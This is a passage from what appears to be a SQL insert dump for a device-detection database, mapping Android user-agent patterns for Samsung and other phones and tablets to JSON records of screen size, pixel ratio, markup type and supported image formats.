Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-N9005) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-N9006) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-N900K) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-N900L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-N900P) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-N900S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-N900T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-N900U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-N900V) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-N900W8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-N910C) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-N910F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-N910H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-N910P) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-N910T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-N910U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-N910V) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-N915F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":400,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-N915FY) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":400,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-N915V) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":400,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-N9208) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-N920C) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-N920V) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-P555) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_p','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":768,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-P600) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_p','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-P605) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_p','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-P900) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_p','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-P905) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_p','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-S920L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_s','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-T235) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":1.33333,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-T280) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":1.33333,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-T285) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":1.3333,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-T285YD) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":534,\"screenHeight\":854,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-T335) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":1.33333,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-T365) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":1.33333,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-T530) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-T531) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-T535) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-T555) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":768,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-T705) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SMART MAX 4.0 PLUS) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SMART Race 4G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SMART Start 3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SO-01G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SO-01H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SO-02G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SO-03F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SO-03H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SO-04G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SOL25) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SOL26) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SOT21) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SOV32) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SP9830I) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SPARK2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SPEED A1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SPH-L720) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SPH-L720T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SS4G7 Sole) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; STARACTIVE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; STARTRAIL7) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; STARXTREM5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; STUDIO ENERGY) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; STUDIO M HD) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; STUDIO SELFIE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; STUDIO X PLUS) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; STUDIO_G_HD) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; STV100-4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SUGAR Y7 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Savvy) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Shark 1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Shift) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SmartMiniII) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SmartPlusII) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Space Phone 5G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Speed-M2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Speed-X2+) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; T01) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; T01) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; T012) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; T012) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; T02) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; T03) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; T04) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 